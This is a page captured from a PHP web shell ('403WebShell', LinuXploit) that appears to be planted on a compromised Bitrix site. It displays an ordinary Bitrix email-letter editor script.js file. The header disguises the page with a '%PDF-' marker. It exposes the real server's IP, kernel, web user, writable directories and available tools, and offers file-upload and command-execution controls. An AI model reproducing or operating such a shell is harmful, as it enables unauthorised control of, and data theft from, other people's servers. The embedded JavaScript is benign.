%PDF- %PDF- 403WebShell
403Webshell
Server IP : 37.220.80.31  /  Your IP : 3.145.93.145
Web Server : Apache/2.4.52 (Ubuntu)
System : Linux 3051455-guretool.twc1.net 5.15.0-107-generic #117-Ubuntu SMP Fri Apr 26 12:26:49 UTC 2024 x86_64
User : www-root ( 1010)
PHP Version : 7.4.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/www-root/data/www/dev.artlot24.ru/bitrix/components/bitrix/sender.letter.edit/templates/.default/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/www-root/data/www/dev.artlot24.ru/bitrix/components/bitrix/sender.letter.edit/templates/.default/script.js
;(function (window)
{

	BX.namespace('BX.Sender');
	if (BX.Sender.Letter)
	{
		return;
	}

	var Page = BX.Sender.Page;
	var Helper = BX.Sender.Helper;

	/**
	 * Letter.
	 *
	 */
	function Letter()
	{
		this.context = null;
	}
	Letter.prototype.init = function (params)
	{
		this.context = BX(params.containerId);
		this.actionUri = params.actionUri;
		this.isFrame = params.isFrame || false;
		this.prettyDateFormat = params.prettyDateFormat;
		this.isSaved = params.isSaved || false;
		this.isOutside = params.isOutside || false;
		this.mess = params.mess;
		this.letterTile = params.letterTile || {};

		this.templateChangeButton = BX('SENDER_LETTER_BUTTON_CHANGE');
		this.selectorNode = Helper.getNode('template-selector', this.context);
		this.editorNode = Helper.getNode('letter-editor', this.context);
		this.titleNode = Helper.getNode('letter-title', this.context);
		this.buttonsNode = Helper.getNode('letter-buttons', this.context);

		this.templateNameNode = Helper.getNode('template-name', this.editorNode);
		this.templateTypeNode = Helper.getNode('template-type', this.editorNode);
		this.templateIdNode = Helper.getNode('template-id', this.editorNode);
		this.consentPreviewNodes = Helper.getNodes('consent-preview', this.editorNode);

		if (BX.Sender.Template && BX.Sender.Template.Selector)
		{
			var selector = BX.Sender.Template.Selector;
			BX.addCustomEvent(selector, selector.events.templateSelect, this.onTemplateSelect.bind(this));
			BX.addCustomEvent(selector, selector.events.selectorClose, this.closeTemplateSelector.bind(this));
		}

		if (this.templateChangeButton)
		{
			BX.bind(this.templateChangeButton, 'click', this.showTemplateSelector.bind(this));
		}

		if(this.consentPreviewNodes)
		{
			this.consentPreviewNodes.forEach((function(element) {
				BX.bind(element, 'click', this.showConsentPreview.bind(this));
			}).bind(this));
		}

		if (this.isFrame)
		{
			Helper.titleEditor.init({
				dataNode: this.titleNode,
				disabled: params.isTemplateShowed,
				defaultTitle: this.getPatternTitle(this.mess.name)
			});

			BX.addCustomEvent("SidePanel.Slider:onClose", this.onPopupClose.bind(this));
		}

		Page.initButtons();

		if (this.isFrame && this.isSaved)
		{
			top.BX.onCustomEvent(top, 'sender-letter-edit-change', [this.letterTile]);
			BX.Sender.Page.slider.close();

			if (this.isOutside)
			{
				BX.UI.Notification.Center.notify({
					content: this.mess.outsideSaveSuccess,
					autoHideDelay: 5000
				});
			}
		}

		if (this.isMSBrowser())
		{
			this.context.classList.add('bx-sender-letter-ms-ie');
		}
	};
	Letter.prototype.onPopupClose = function(event) {
		var slider = event.getSlider();
		var _this = this;

		if(!this.isSaved)
		{
			self.popupWindow = BX.PopupWindowManager.create(
				'sender-letter-on-slider-close',
				null,
				{
					content: this.mess.applyClose,
					titleBar: this.mess.applyCloseTitle,
					width: 400,
					height: 200,
					padding: 10,
					closeByEsc: true,
					contentColor: 'white',
					angle: false,
					buttons: [
						new BX.PopupWindowButton({
							text: this.mess.applyYes,
							className: "popup-window-button-accept",
							events: {
								click: function() {
									BX.removeCustomEvent("SidePanel.Slider::onClose", _this.onPopupClose);
									event.allowAction();
									slider.close();
									setTimeout(function() {
										slider.destroy();
									}, 500);
								}
							}
						}),
						new BX.PopupWindowButton({
							text: this.mess.applyCancel,
							className: "popup-window-button-cancel",
							events: {
								click: function() {
									this.popupWindow.close();
								}
							}
						})
					]
				}
			).show();


			if(typeof slider.data.close === 'undefined' || slider.data.close === false)
			{
				event.denyAction();
			}
		}
	};

	Letter.prototype.isMSBrowser = function ()
	{
		return window.navigator.userAgent.match(/(Trident\/|MSIE|Edge\/)/) !== null;
	};
	Letter.prototype.getPatternTitle = function (name)
	{
		return Helper.replace(
			this.mess.patternTitle,
			{
				'name': name,
				'date': BX.date.format(this.prettyDateFormat)
			}
		);
	};
	Letter.prototype.onTemplateSelect = function (template)
	{
		if (this.templateNameNode)
		{
			this.templateNameNode.textContent = template.name;
		}
		if (this.templateTypeNode)
		{
			this.templateTypeNode.value = template.type;
		}
		if (this.templateIdNode)
		{
			this.templateIdNode.value = template.code;
		}

		if (template.dispatch)
		{
			Helper.getNodes('dispatch', this.context).forEach(function (node) {
				var code = node.getAttribute('data-code');
				if (template.dispatch[code])
				{
					node.value = template.dispatch[code];
				}
			});
		}

		this.titleNode.value = this.getPatternTitle(template.name);
		BX.fireEvent(this.titleNode, 'change');

		this.closeTemplateSelector();
		window.scrollTo(0,0);
	};
	Letter.prototype.closeTemplateSelector = function ()
	{
		this.changeDisplayingTemplateSelector(false);
	};
	Letter.prototype.showTemplateSelector = function ()
	{
		this.changeDisplayingTemplateSelector(true);
	};
	Letter.prototype.showConsentPreview = function (event)
	{
		event.preventDefault();
		var element = event.target;

		var consent = document.getElementsByName(element.dataset.bxInputName)[0];
		var consentId = consent.value;
		BX.Sender.ConsentPreview.open(consentId);
	};
	Letter.prototype.changeDisplayingTemplateSelector = function (isShow)
	{
		var classShow = 'bx-sender-letter-show';
		var classHide = 'bx-sender-letter-hide';
		Helper.changeClass(this.selectorNode, classShow, isShow);
		Helper.changeClass(this.selectorNode, classHide, !isShow);

		Helper.changeClass(this.editorNode, classShow, !isShow);
		Helper.changeClass(this.editorNode, classHide, isShow);

		Helper.changeDisplay(this.templateChangeButton, !isShow);
		Helper.changeDisplay(this.buttonsNode, !isShow);

		isShow ? Helper.titleEditor.disable() : Helper.titleEditor.enable();
	};
	Letter.prototype.applyChanges = function()
	{
		var form = this.context.getElementsByTagName('form');
		if (form && form[0])
		{
			form[0].appendChild(BX.create('input', {
				attrs: {
					type: "hidden",
					name: "apply",
					value: "Y"
				}
			}));
		}
	};

	BX.Sender.Letter = new Letter();

})(window);

Youez - 2016 - github.com/yon3zu
LinuXploit